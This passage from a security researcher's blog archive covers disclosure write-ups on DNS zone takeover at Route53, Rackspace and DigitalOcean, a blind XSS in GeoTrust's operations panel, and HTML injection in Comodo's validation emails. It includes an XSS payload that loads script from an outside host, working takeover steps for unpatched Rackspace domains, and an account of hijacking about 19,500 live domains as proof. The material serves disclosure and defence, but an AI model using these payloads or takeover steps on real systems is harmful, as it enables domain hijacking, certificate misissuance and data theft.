  • Sep 5, 2016: Responded to the team with an apology for contact them on labor day and thanking them for the quick response time.
  • Sep 7, 2016: Contacted by Zack from the AWS security team, requesting a call to talk more about the issue and understand a disclosure strategy.
  • Sep 7, 2016: Responded confirming that Sep 8 works for a call to discuss.
  • Sep 8, 2016: Call with AWS to discuss the vulnerability and plans to alert affected customers and remediation of the issue.
  • Oct 7, 2016: Follow up call with someone from the Route53 team discussing Amazon’s remediation strategy and next steps. Their plan was three pronged in approach:

All of the above steps were indeed taken by Amazon. You now get the following warning when you delete a zone in Route53:

route53_warningIf you are an AWS customer using Route53, be sure to read this documentation about the risks of not changing your domain nameservers after deleting a zone from your account.

Disclosure notes: Overall this team was awesome to do disclosure with, they were super helpful and cared deeply about getting a proper fix in place. The response in less than an hour on labor day (late at night too) was crazy to see, very impressed. Great job guys :), wish all disclosure were like this.

Rackspace (~44K Domains Affected, Won’t Fix)

Rackspace offers a Cloud DNS service which is included free with every Rackspace account. Unlike Google Cloud and AWS Route53 there are only two nameservers (dns1.stabletransit.com and dns2.stabletransit.com) for their cloud DNS offering so no complicated zone creation/deletion process is needed. All that needs to be done is to enumerate the vulnerable domains and add them to your account. The steps for this are the following:

  • Under the Cloud DNS panel, click the “Create Domain” button and specify the vulnerable domain and a contact email and TTL.
  • Now simple create whatever DNS records you’d like for the taken over domain.

This can be done for any of the 44K domain names to take them over. Rackspace does not appear to be interested in patching this (see below) so if you are a Rackspace customer please ensure you’re properly removing Rackspace’s nameservers from your domain after you move your domain.

Disclosure & Remediation Timeline

  • Sep 9, 2016: Reported vulnerability to the Rackspace security team, included a list of vulnerable domains.
  • Sep 12, 2016: Rackspace responds with the following:

    “Thank you for your submission. We have taken it under advisement and will contact you if we require any additional information. For the protection of our customers, Rackspace does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches, fixes, or releases are available. Rackspace usually distributes security disclosures and notifications through blog posts and customer support portals.__Please do not post or share any information about a potential security vulnerability in any public setting until we have researched, responded to, and addressed the reported vulnerability and informed customers, if needed. Our products are complex, and reported security vulnerabilities will take time to investigate, address, and fix.__While we sincerely appreciate reports for vulnerabilities of all severity levels, we will include your name on our website at http://www.rackspace.com/information/legal/rsdp if you report a previously unknown vulnerability, which Rackspace has determined to be of a high or critical severity, or in cases where there has been continued research or other contributions made by the person.__Thanks and have a great day.”

  • Sep 14, 2016: Due to the previous email seeming to state that they won’t confirm the issue until a full investigation occurs – I ask that they notify me when remediation has occurred so I can properly coordinate releasing the vulnerability information to the general public.
  • Oct 7, 2016: Due to a lack of response from vendor, notified them that a 90-day responsible disclosure timeline would be observed with a disclosure occurring regardless of a patch.
  • Nov 7, 2016: Pinged Rackspace (no response as of yet) notifying them that disclosure will occur in 30 days.
  • Dec 5, 2016: Received the following response from Rackspace:

    “Thank you again for your work to raise public awareness of this DNS issue. We’ve been aware of the issue for quite a while. It can affect customers who don’t take standard security precautions when they migrate their domains, whether those customers are hosted at Rackspace or at other cloud providers.

     

    If a customer intends to migrate a domain to Rackspace or any other cloud provider, he or she needs to accomplish that migration before pointing a domain registrar at that provider’s name servers. Otherwise, any customer of that provider who has malicious intentions could conceivably add that domain to his or her account. That could allow the bad actor to effectively impersonate the domain owner, with power to set up a website and receive email for the hijacked domain.

     

    We share multiple articles about DNS both on the Rackspace Support Network (https://support.rackspace.com/) and in the Rackspace Community (https://community.rackspace.com/). Our Acceptable Use Policy (http://www.rackspace.com/information/legal/aup) prohibits activities like this. Our support teams also work directly with customers to help them take the simple steps necessary to secure their domains.

     

    We appreciate your raising public awareness of this issue and are always glad to work with you.

     

    Sincerely,

    The Rackspace DNS Team”

Disclosure notes: Responsible disclosures that affect a large number of vendors usually take a full 90-days because one vendor drags their feet until the very end. In this case it appears Rackspace is that vendor. Their policy, specifically the following: “Rackspace does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches, fixes, or releases are available.” does not instill confidence that anything is being done to address reported security vulnerabilities. To not confirm or discuss a reported security vulnerability until after remediation is a very odd approach and it’s unclear why such a policy would ever be in place. One would hope that all of the initial reports they receive are 100% clear in explanation, since they cannot ask any questions until after remediation of said unclear vulnerability has occurred. Additionally, the final response seems to be to the effect of “we write many articles about DNS, also if a customer doesn’t properly remediate this issue, they will be vulnerable but it is against our AUP to exploit this issue”. So this puts extra importance on raising awareness for this issue, since Rackspace does not appear interested in issuing a fix for this issue.

DigitalOcean (~20K Domains Affected)

For the full write up on how this issue affected Digital Ocean, please see this post.

Remediation Recommendation

Different cloud providers took different approaches to this issue. My recommendation for remediation of this issue is fairly straightforward and is the following:

  • User adds the domain to their account via the cloud management panel.
  • At this time the cloud provider returns a random list of nameservers for the domain owners to point their domain to. For example the following is an example list:
    • a-nameserver-one.example.com
    • a-nameserver-two.example.com
    • a-nameserver-three.example.com
  • The cloud provider now continually queries the TLD’s nameservers for the list of nameservers that the domain has been set to. Once the user has set their nameservers properly the cloud provider stores the list of nameservers and the domain in a database.
  • For any future zones created for this domain the cloud provider will only return nameservers which do not match the stored list of nameservers. This means that in order to use a newly created zone the domain owner will have to set their domain’s nameservers to a new nameserver set, ensuring that only the domain owner can actually carry out this action.
  • The cloud provider will continually query the TLD nameservers to see if the domain’s nameservers have changed to the new set and will store the results in a database as we did in step 3.

The above method does add a bit of friction to the process of re-creating a zone for a domain, but completely prevents this issue from occurring. Since the friction is only equivalent to the initial domain import process it doesn’t seem to be too unreasonable but it is possible that provider won’t want to inconvenience customers this way.

Usefulness to Attackers

The attack scenario for this vulnerability can be split into two separate groups, targeted and un-targeted. Depending on the end goal of an attacker, either one could be chosen.

Targeted Attack

In the targeted use case you have an attacker who wants to take over a specific domain or list of domains belonging to their victim. In this case an attacker would set up a script to continually perform NS queries against the nameservers of the domains that they are targeting. The script will detect if it has received an SERVFAIL or REFUSED DNS error and will immediately attempt to allocate the target’s nameservers upon detecting no zone exists for the domain. Many different mistakes on the domain owners part could cause the zone to be deleted such as the cloud provider deleting the zone due to lack of payment, or if the company is changing providers, etc.

Un-Targeted Attack

The more likely attack scenario, in my opinion, would be an attacker who is merely interested in clean domains to be used for malware and spam related campaigns. Since many threat intelligence services will rate a domain based off of its age, length of registration, and cost to register there is a big advantage to hijacking existing domains over registering new ones. In addition to the hijacked domains often having past history and a long age, they also have WHOIS information which points to real people unrelated to the person carrying out the attack. Now if an attacker launches a malware campaign using these domains, it will be harder to pinpoint who/what is carrying out the attack since the domains would all appear to be just regular domains with no observable pattern other than the fact that they all use cloud DNS. It’s an attacker’s dream, troublesome attribution and an endless number of names to use for malicious campaigns.

Conclusion

This vulnerability is a systemic issue which affects all major managed DNS providers. It is very likely that more providers are affected which are not mentioned here. All managed DNS providers are encouraged to check their own implementations for this issue and patch/notify customers as soon as possible.

Until next time,

-mandatory

bur_resized

This is a continuation of a series of blog posts which will cover blind cross-site scripting (XSS) and its impact on the internal systems which suffer from it. Previously, we’ve shown that data entered into one part of a website, such as the account information panel, can lead to XSS on internal account-management panels. This was the case with GoDaddy, the Internet’s largest registrar. Today we will be showing off a vulnerability in one of the Internet’s certificate authorities which allows us to get a rare peak inside of their internals.

One of the Best Disclosure Experiences in a Long Time

Before we start I would like to call out the awesome responsible disclosure experience I had with Symantec (the owner of GeoTrust). To be honest I had incredibly low expectations before I contacted them but the person I talked with (Mike) was a super helpful and made the experience completely painless. They had no problem using PGP, kept me updated with the status of the bug, and gave me a tracking ID for the vulnerability – all signs of a mature disclosure program. Finally they even took action to ensure that the entire code base was scrubbed for other XSS vulnerabilities which actually took me aback with the level of pro-activeness. While the security community seems to now hate vendors if they don’t reward $50,000 for every security issue, I still really appreciate companies working with researchers even if no reward is involved. The security advisory for this vulnerability has also been posted to their website and can be found here.

What is a Certificate Authority?

For those unfamiliar with the inner-workings of SSL/TLS, the entire system works based off of trusting a few certificate authorities (CAs). These certificate authorities have the power to mint intermediate certificate authorities which can then mint certificates for websites looking to protect their communications with SSL/TLS. All of these certificate authorities are embedded in your web browser by default which gives them this power. This system means that the certificate authorities can sell this service, as is the case with GeoTrust, or offer it for free as is the case with Let’s Encrypt. In order for an attacker to intercept communications to these websites, they must have access to a trusted CA or an intermediary CA created by a trusted CA which is already embedded in the user’s browser. Mozilla, the creator of the Firefox web browser, keeps a simple list of certificate authorities that are trusted in Firefox by default here. One of the important responsibilities of certificate authorities is to ensure that only the true owners of websites are allowed to issue certificates. This is to ensure that malicious actors don’t get a valid certificate for a website that they do not own (such as google.com, etc). If a certificate authority fails to carry out this duty properly it risks being removed from all modern web browsers. This was the case with the certificate authority DigiNotar which was breached and used to issue improper SSL/TLS certificates for Gmail, allowing the Iranian government to spy on its citizens. Browser vendors reacted by removing DigiNotar from their trust stores, meaning that all certificates issued by this certificate authority no longer trusted and would throw an SSL error when used. In the end, this led to the Dutch goverment taking over the company and ultimately, bankruptcy for DigitNotar.

Discovering the Vulnerable GeoTrust Operations Dashboard

Originally, I wasn’t looking for a vulnerability in GeoTrust at all, I simply wanted to obtain a trusted SSL/TLS certificate with my XSS Hunter payloads in some of the certificate fields using various certificate authorities. This was an attempt to enumerate vulnerabilities in systems which scan the Internet for these certificates and index them. However, during my testing I found an unintended vulnerability in GeoTrust’s Operations Panel when a support agent viewed my certificate request information. I woke up one morning with an XSS Hunter payload fire email titled [XSSHunter] XSS Payload Fired On https://ops.geotrust.com/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp in my inbox with the following screenshot attached:

redacted_geotrust_op_screenshotThe above screenshot is partially redacted to respect the privacy of the customers of GeoTrust (and the agent viewing the page). However, the red highlighted portion shows the location of the XSS payload which had fired.

In the above screenshot there appears to be a “Vetting” portion to this operations panel. Likely this is for manual “vetting” of those requesting certificates. I’ll leave the possible security implications of this up to the reader. However, I was not able to verify its purpose since I didn’t want to overstep my boundaries in any way.

So what code made this page vulnerable? Let’s take a closer look.

Better Context, Better Understanding

Since our XSS Hunter probe collects the vulnerable page’s DOM we can investigate the page’s JavaScript source code to attempt to discover the cause of this vulnerability. In this case the root of the vulnerability appeared to be caused by a vulnerable function named getOrders. The code for this function is the following:

function getOrders() {

    // get the form values
    var dateInput = $('#date2').datepicker( "getDate" );
    var range1 = $('#from').datepicker( "getDate" );
    var range2 = $('#to').datepicker( "getDate" );

    dateInput = $.datepicker.formatDate('@', dateInput);
    range1 = $.datepicker.formatDate('@', range1);
    range2 = $.datepicker.formatDate('@', range2);

    var curr = new Date();

    if((curr - range2) < 86400000){
           alert("Cannot cancel orders less than 21 days old")
    }else{

        if($('input[name=searchRadio]:checked').val() == "byDate"){
                range1 = 0;
                range2 = dateInput;
        }

        range1 = range1.toString();
        range2 = range2.toString();

        $.ajax({
            type: "GET",
            dataType: "json",
            url: "/opsdashboard/CancelAgedOrdersServlet",
            data: "range1=" + range1 + "&range2=" + range2 + "&cancel=false",
            success: function(data, textStatus, XMLHttpRequest){
                var table = "<table border=\"1\" cellpadding=\"3\" cellspacing=\"0\" align=\"center\"><tr><td bgcolor=\"pink\">" +
                                "Order ID</td><td bgcolor=\"pink\">Product Name</td><td bgcolor=\"pink\">Customer Name" +
                                "</td><td bgcolor=\"pink\">Order Date</td><td bgcolor=\"pink\">Order State</td></tr>";
                var count = data.length;
                var i;
                if(count==0){
                    alert('No orders to retrieve');
                     $('#getOrdersDiv').show();
                }
                else if(count==1 && data[0].RecordsOverflow == "true"){
                    alert('Too many records retrieved, please reduce date range.');
                     $('#getOrdersDiv').show();
               }
                else{
                for(i = 0; i < count; i++){
                    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product +
                    "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date +
                    "</td><td>" + data[i].State + "</td></tr>";
                }

                table = table + "</table>";
                $('#grid').html(table);
                $('#grid').show();
                $('#cancels').show();
            }

            },
            error: function(XMLHttpRequest, textStatus, errorThrown){
                alert('No orders to retrieve');
                $('#getOrdersDiv').show();
            }
        });
    }
}

The above code shows that the HTML table seen in the screenshot is created by concatenating HTML with order information retrieved from a JSON endpoint /opsdashboard/CancelAgedOrdersServlet. The relevant lines are the following:

for(i = 0; i < count; i++){
    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product +
    "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date +
    "</td><td>" + data[i].State + "</td></tr>";
}

The product ID, name, customer name, and state are all used to concatenate each row in the HTML table. When going through the free-trial certificate sign up process the customer name I provided was the following:

"><script src=https://y.vg></script>

Once the JavaScript code runs on my input, it creates a row with the following HTML:

<tr><td>13785664</td><td>GeoTrust SSL Trial</td><td>"><script src="https://y.vg"></script</td><td>06/06/2016 05:40:04</td><td>Waiting for Whois Approval</td></tr>

Finally, the entire HTML blob is inserted into the DOM with the following line:

$('#grid').html(table);

This causes the _

String concatenation is one of the most common ways for XSS vulnerabilities to occur and this is no exception. The important thing to note in this example is that we are able to determine the root cause of the vulnerability with ease due to the amount of contextual information collected by our XSS Hunter payloads. This makes communicating the root issue much easier and has in the past even led to vendors becoming concerned that I have actually logged in as an internal agent (though not in this specific case). In the world of blind payload testing, context is everything. You may only trigger the vulnerability a single time so you must have as much information as possible if you want to get it fixed.

Exploitation During Remediation

Shortly after discovering this vulnerability I reached out to the Symantec security team to disclose this vulnerability. After a quick exchange of PGP keys the team received the vulnerability and confirmed they understood the issue and told me they would work on getting in contact with the appropriate product team.

A few days after this had occurred I woke up to yet another payload fire email, this time the title was the following:

[XSSHunter] XSS Payload Fired On https://stage1-ops.geotrust.symclab.net/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp

Attached was the following screenshot:

symantec_staging_xss_payload_fireThe above screenshot requires less redaction, because it is filled with test data due to it being a staging instance. Apparently the product team that received the vulnerability report decided to use the same payload in staging as in production. In the upcoming days I received a few more payload fires from the same IP addresses:

[XSSHunter] XSS Payload Fired On file:///C:/Users/sachin_[REDACTED_LAST_NAME]/Desktop/iFrame.html

[XSSHunter] XSS Payload Fired On https://ft1-ops.geotrust.symclab.net/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp

Humorously the first email contained the following screenshot attached to it:

symantec_desktop_fire

The DOM contents were the following:

<html><head></head><body><header>Hello</header>
 
<iframe src="https://stage2-products.geotrust.symclab.net/orders/rapidssl.do?ref=454848RAP60985"></iframe>
 
`">` (S `"><table title="Click to Verify - This site chose Symantec SSL for secure e-commerce and confidential communications." border="0" cellpadding="2" cellspacing="0" width="135">
<tbody><tr>
<script>alert(1)</script><script src="https://y.vg"></script>
</tr></tbody></table>
</body></html>

It appeared one of the product team members was attempting to analyse the payload. The “Hello” made me wish I could’ve sent a response. So if you’re Sachin and you’re reading this post…hi! After receiving a few of these payload fires I reached back out to Symantec to let them know that the product team was testing with my payload. They communicated this to the team and I stopped receiving them shortly after.

The above occurrence points out another interesting angle of using blind cross-site scripting payloads. Since you are alerted of all payload fires, an attacker can not only learn about the XSS vulnerabilities themselves but also if someone is investigating the payload. This gives the attacker an advanced warning of someone looking into their activities.

In addition to early warning, it shows that developer’s first instincts can also be quite dangerous. The User-Agent of the developer who opened a local HTML file indicated that he was using Firefox 46 on Windows 7. The browser being used is important because file:// URIs are treated very differently depending on which browser is being utilized. Firefox, for example, allows you to use XMLHTTPRequest to retrieve files which are in the same directory or lower on the file system. This means that had I been malicious I could have written a payload to enumerate and send me files off of the developer’s hard drive (assuming they were in the same or lower directory of the fired .html payload file). Since this file was opened from the developer’s Desktop that means the payload could’ve stolen everything else located there as well (what do you have on your desktop?). What started out as an XSS vulnerability in a website has now become a vulnerability which can ex-filtrate files from a developer’s computer.

Final Thoughts

From this case study we’ve learned a lot about the precarious nature of blind XSS testing. If you are interested in testing for these types of vulnerabilities yourself, you can sign up for an account on the XSS Hunter website. If you don’t trust me or want to run your own version you can get a copy of the source code on Github.

Disclosure Timeline

  • July 7th: XSS payload fire email received indicating the GeoTrust Operations Panel was vulnerable.
  • July 7th: Email sent to [email protected] – bounce message received.
  • July 7th: Sent vulnerability report to [email protected] instead after discovering Symantec owns GeoTrust.
  • July 8th: Received response from Mike at Symantec with a PGP key for encrypting the vulnerability details.
  • July 8th: Responded with PGP-encrypted vulnerability report.
  • July 8th: Vulnerability is confirmed by Mike and he states that he will reach out to the relevant team to get it fixed.
  • July 14: Reached back out to Symantec to alert them that the product team is using the https://y.vg payload in staging testing.
  • July 15: Mike from Symantec states he’ll follow up with the team about it, provides the tracking ID of SSG16-042 for the vulnerability.
  • August 31: Symantec posts advisory on their website, it’s likely that a fix happened long before this point but extra time was taken to check the rest of the panel for further vulnerabilities.

crashed_ship

The above image is taken from here and was taken by Steve Jurvetson.

EDIT: DigitalOcean seems to be getting a lot of flak from this post so I’d just like to point out that I feel DigitalOcean’s reaction in this case was entirely justified (they saw an anomaly and they put a stop to it). The only thing I’d wish was done differently would be that the domains were deleted from my account upon me being banned. There was a few hour delay between testing and reaching out to them and ideally I should’ve reached out ahead of time. The main reason I did not reach out with the theory instead of the proof-of-concept was because I believed that it would be ignored due to lack of evidence (as is my experience with past disclosures). Overall my impression of DigitalOcean’s security team is very positive and I will definitely be much more proactive about reaching out to them in the future.

DigitalOcean is a cloud service provider similar to Amazon Web Services or Google Cloud. They offer cloud DNS hosting as one of their product lines – a nice guide on how to set up your domain to use their DNS can be found here. Take a moment to read it over and see if you can spot any potential issues with their domain name set up process.

From a quick glance it appears to be a very easy to use system. For example: No pesky domain validation to impede your ability to add any arbitrary domain to your account, no need to recall who is on your domain’s WHOIS, and no need to set your domain to specific nameservers as is needed with systems such as Cloudflare. In fact all you have to do is the following:

“Within the Networking section, click on Add Domain, and fill in the the domain name field and IP address of the server you want to connect it to on the subsequent page.”

So, if you’d like, you can add my domain thehackerblog.com to your own DigitalOcean account right now (assuming nobody else has done so already). This brings up interesting questions like, “can people block me from importing my domain to DigitalOcean?” and, “what happens when I delete my domain from DigitalOcean but forget to change the nameservers?“. These are good questions, but before we answer them we’ll take a short detour to another cloud provider and see how their implementation differs.

The Route53 Set Up Process

Amazon Web Services, or AWS, also offers cloud DNS hosting in the form of its product line known as Route53. As a test, we’ll try the set up process for the domain thehackerblog.com. You can see AWS’s official documentation here if you’d like to try this yourself. The first step is to click the Create Hosted Zone button in the top left corner of the Route53 control panel. We’ll now fill in the domain we wish to use along with a short comment and whether or not we wish for this DNS zone to be public. Finally we hit create and are brought to the DNS management panel for our newly created zone. The NS record type has been pre-populated with a few randomly generated nameservers. For example, the nameserver list I received after trying this is as follows:

ns-624.awsdns-14.net.

ns-39.awsdns-04.com.

ns-1651.awsdns-14.co.uk.

ns-1067.awsdns-05.org.

The above is very important – if I created a zone for thehackerblog.com and you did the same we’d both get different nameservers. This ensures that nobody could takeover my domain if I deleted the zone file from my AWS account because the nameservers are specific to my account. So, if I deleted my domain and you wanted to take it over, you’d have to keep trying until you get the same nameserver set as above in order to do so. Otherwise my domain would be pointed to other nameservers than the ones you control.

Back to DigitalOcean

Returning to DigitalOcean, the answer to the question “what happens when I delete my domain from DigitalOcean but forget to change the nameservers?” becomes clear. If you delete the domain from your account anyone can immediately re-add it to their own account without any verification of ownership and take it over.

It’s one thing to notice a possible issue that could occur but proving that it does occur at a large scale is another beast. How can we find out if this issue is systematic and common without attempting to add every domain on the Internet to our DigitalOcean account? How would we even get a list of every domain name anyway?

To start, one notable way to tell if a domain has been added to a DigitalOcean account is to perform a regular DNS query and see how the DigitalOcean nameserver’s respond. As an example, we’ll use alert.cm, which has their nameservers set to DigitalOcean but are not listed under any DigitalOcean account:

mandatory@Matthews-MacBook-Pro-4 ~> dig NS alert.cm @ns1.digitalocean.com.

; <<>> DiG 9.8.3-P1 <<>> NS alert.cm @ns1.digitalocean.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 53736
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;alert.cm.            IN    NS

;; Query time: 51 msec
;; SERVER: 173.245.58.51#53(173.245.58.51)
;; WHEN: Tue Aug 23 23:09:00 2016
;; MSG SIZE  rcvd: 26

As can be seen in the above dig output, the DigitalOcean nameservers returned a DNS REFUSED (RCode 5) error which indicates that the nameservers refused to respond to the NS record query we performed. This gives us an easy and lightweight way to differentiate between domains that are currently listed under a DigitalOcean account and domains that aren’t.

This solves one part of the problem, but checking every domain on the Internet this way is still very intensive. Additionally, how can we get a list of every domain name on the Internet? The answer is to get a copy of the zone files for various top level domains (TLDs). To start we’ll acquire the zone files for the .com and .net TLDs because they are easily acquirable from Verisign for research purposes. The zone files contain every .com and .net domain in existence and their corresponding nameservers. By grepping through these zone files we can figure out exactly how many .com & .net domain names use DigitalOcean for DNS hosting. At the time of this writing, the count for both TLDs are the following:

  • .com: 170,829
  • .net: 17,101

Combined, this is a total of 187,930 domain names that have DigitalOcean as their DNS provider. We can now query all of these domains to check for DNS REFUSED errors to see if they are not listed under a DigitalOcean account (and are thus able to be taken over). After a short Python script and a few hours of DNS querying we are able to enumerate all of the vulnerable domains (at least in the two TLDs previously mentioned). The final count comes out to be 21,598 domains that returned a DNS REFUSED error upon querying them. After adding these domains to my DigitalOcean account via their API, the real number turned out to be closer to ~19,500 domains (as it appears the DNS method was not 100% accurate). For all of the domains added to my account a single DNS A record for the base domain was added to a EC2 instance. This was done in hopes of understanding why so many domains ended up in this state, and the results were quite surprising.

The Sinkholed Traffic

While I expected that most of the domains were purely spam/junk domains that had not yet been configured (perhaps all belonging to a single domain reseller for example) – this was not the case. The sinkhole server was just a standard nginx web server returning a blank webpage and logging web requests. After having the server up for just a few days the access logs have grown to 1.8GB in size with a constant stream of requests pouring in. Most of these are unsurprisingly from search engines eager to crawl the web as quickly as possible (~80% of the traffic was from spiders) however the rest are legitimate users navigating to the now redirected websites.

DigitalOcean’s Response

After sinkholing the domains and proving that the theory was in fact true, I reached out to DigitalOcean’s security team describing the issue (using PGP as specified by their security page). Their response was the following:

Matthew,

Thank you for sending this in. This is a known workflow within our platform. We are committed to always improving our customer’s experience and have been examining ways of minimizing the type of behavior you are describing.

Regards,

Nick

Nicolas [REDACTED] [email protected]

So essentially they’re aware and may be looking for ways to mitigate this behaviour in the future but they don’t appear to be making any immediate plans.

Additionally my DigitalOcean account had been locked. This prevented me from the next logical step: changing all the DNS to point to 127.0.0.1 – effectively neutering the traffic. When asking support why my account had been locked (though I had some idea) I received the following response:

There has been a response to your ticket:

Hi there,

We have reviewed your account, and we are not able to provide further service.

I understand this may be inconveniencing, but we are not going to be able to provide you hosting services.

This is a final decision and is not subject to change.

Regards,

Cash [REDACTED] Trust & Safety Specialist

Digital Ocean Support

So no reasoning for the ban and there would be no further support. This leaves me in the uncomfortable position of being stuck with all the traffic I’ve been sinkholing. Since I can’t access my account to change the domain’s DNS, I’m stuck receiving thousands of requests a minute from various sites. I can’t tear down the EC2 sinkhole server because the Elastic IP may be re-allocated to someone more malicious so I have to pay to keep it up (for how long I’m not sure). While I’ve stopped all services on the server to protect the privacy of the users accidentally hitting these sites, and have srm-ed the access logs, I am unable to stop the flood of traffic going forward. Being in this awkward position, I reached out to DigitalOcean’s team to see if they can assist in deleting the domains from my account (sadly leaving them vulnerable again) or sinkholing the DNS to 127.0.0.1. I received a very helpful response from someone on the security team and it appears they will look into it.

In Review

This provides some interesting insight as to why the pattern of using unique nameservers for importing domain names is so common (to prevent exactly this issue). It’s worthy to note that any system which uses non-unique nameservers for domain name importing is likely vulnerable to this exact same type of attack pattern (what about registrars? domain parking services?). Further research into this area is likely to yield similar results.

Until next time,

-mandatory

Proofread by udanquu

I recently decided to investigate the security of various certificate authority’s online certificate issuing systems. These online issuers allow certificate authorities to verify that someone owns a specific domain, such as thehackerblog.com and get a signed certificate so they can enable SSL/TLS on their domain. Each online certificate issuing system has their own process for validation of domains and issuing certificates which leaves a lot of attack surface for malicious entities.

A Summary On Certificate Authorities & SSL/TLS

For those unfamiliar with the current certificate authority (CA) system used on the web, I’d recommend watching Moxie Marlinspike’s talk on SSL and the Future of Authenticity for an in-depth look. This is also happens to be one of my favorite talks and Moxie is a great speaker, so I highly recommend it (bonus points, he also talks about Comodo specifically). For those who don’t want to watch the talk, I’ll write a short summary here.

The SSL/TLS system, which encrypts communications in modern web browsers, works by your browser trusting a list of built-in certificate authorities. Whenever your browser attempts to connect to a site over SSL/TLS it will retrieve the site’s certificate and check to see if it is trusted by one of these built-in authorities. These authorities are allowed to mint intermediate certificate authorities which can mint SSL/TLS certificates for arbitrary websites. This creates tall trees of trusts where one certificate mints another certificate, which finally mints a certificate for an website like example.com. For a good visual of the certificate authority trees of trust, click here.

This entire system was designed to prevent man in the middle attacks which attempt to snoop on a victim’s traffic. When SSL/TLS is implemented properly, an attacker would have to present a valid certificate which has been signed by one of the trusted intermediate certificate authorities. If an attacker did have access to a valid signed certificate for a site, it would allow him or her to intercept all traffic to that site and the browser would still show the “secure lock” in the URL bar saying everything is fine. Suffice to say, ensuring the online systems which allow people to obtain signed certificates are secure is very important. If ANY of the existing online certificate issuing systems were compromised then the entire system is essentially bypassed.

Hunting for Vulnerable Issuers

When I started out hunting for possible vulnerabilities, my initial strategy was to look for the cheapest, most 90’s-looking, poorly designed certificate authority websites. Since the compromise of any certificate authority allows an attacker to bypass all the protections of SSL/TLS it doesn’t even have to be a popular provider because they all have the same power. After doing a bit of searching I realized it would be advantageous to do testing against authorities that had free SSL certificates, since doing tests against these wouldn’t cost me any money. I passed on Let’s Encrypt because I figured it had already been thoroughly audited, the second site I saw was a 30 day free trial from Positive SSL (a company owned by Comodo). This seemed like as good a target as any, so I went through their online process for issuing a free 30-day trial certificate for my website thehackerblog.com.

Comodo’s 30-Day PositiveSSL Certificate Online Issuer

The following is a screenshot of the PositiveSSL website, advertising the free 30 day trial:

1-free-ssl-pageThe process starts by requesting a certificate signing request (CSR) from the interested user. This can easily be done by using OpenSSL via the command line:

openssl req -new -newkey rsa:2048 -nodes -keyout yourdomain.com.key -out yourdomain.com.csr

Once you have your CSR, you then have to paste it into the web application:

2-csr-request

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Upon entering your CSR and selecting the software you used to generate it, you then select the email address for domain validation (from the website’s WHOIS) and arrive on a “Corporate Details” page. This is the vulnerable portion of the application, where you fill out your company/personal information getting to the email validation portion:

4-corporate-details

When I first went through this process I mindlessly filled out junk HTML for all of these fields. The service then sent a verification email to the email address on the website’s WHOIS info. Once I received the email, I noticed the HTML was not being properly escaped and the markup I had entered before was being evaluated. This is really bad because the email also contained a verification code which could be used to obtain an SSL/TLS certificate for my website. This means if I had a way to leak a victim’s token, I could obtain a valid certificate for their site, so that I could intercept traffic to that site seamlessly without users knowing I was doing so.

Dangling Markup Injection in Confirmation Emails

Since almost no email clients support _

Delivered-To: mandatory@[REDACTED]
...trimmed for brevity...
From: "Comodo Security Services" <noreply_support@comodo.com>
To: "mandatory@[REDACTED]" <mandatory@[REDACTED]>
Date: Sun, 05 Jun 2016 00:21:23 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="(AlternativeBoundary)"
Message-ID: <douEzQt+Ql/CywdHoZA/kg@mcmail1.mcr.colo.comodo.net>
...trimmed for brevity...
--(AlternativeBoundary)
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit

<html>
<head>
  <style type=text/css>
  <!--
    body { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    p { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    pre { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    pre.validate { font-family: Arial, Helvetica, sans-serif; font-size:11pt; color:#007A00; font-weight: bold;}
    pre.reject { font-family: Arial, Helvetica, sans-serif; font-size:7pt; color:#FF0000; font-weight: bold;}
    td { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    .p8 { font-family: Arial, Helvetica, sans-serif; font-size: 8pt; font-weight: normal }
    .p4 { font-family: Arial, Helvetica, sans-serif; font-size: 10pt; color: #006699; font-weight: bold }
    A:link    { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:visited { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:active  { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:hover   { font-family: Arial; color: #003399; font-weight: bold; text-decoration: underline }
    .title { font-family: Arial, Helvetica, sans-serif; font-size: 11pt; font-weight: bold; color: #003399 }
    -->
  </style>
</head>
<body bgcolor=#CCCCCC text=#000000 leftmargin=4 topmargin=5>
<table width=780 border=0 cellspacing=0 cellpadding=1 align=left>
  <tr><td align=left><img border="0" src="http://secure.comodo.net/images/banners/logo_comodo.png"></td></tr>
  <tr>
    <td bgcolor=#000000>
      <table width=780 border=0 cellspacing=0 cellpadding=3 align=left>
        <tr>
          <td bgcolor=#FFFFFF>
            <br><font size=2 class=title>Domain Control Validation for:[REDACTED]</font>
          </td>
        </tr>
        <tr>
          <td bgcolor=#FFFFFF colspan=2>
            <p><br>Dear mandatory@[REDACTED],</p>
            <pre>
We have received a request to issue an SSL certificate for:
Domain: [REDACTED]
Subject: 
             <h1>Injection Test</h1>
<br>This order was placed by <h1>Injection Test</h1><h1>Injection Test</h1> whose phone number is 1231231234 and whose email address is mandatory@[REDACTED]</pre>
            <pre class="validate">
<b>To permit the issuance of the certificate please browse <a href="https://secure.comodo.net/products/EnterDCVCode?orderNumber=21757254"><font color=#007A00>here</font></a>
and enter the following "validation code":</b></pre>
            <pre class="validate" style="text-align:center;"><b>Z7R58i[REDACTED]</b></pre>
            <pre class="reject"><br><br><br><br>
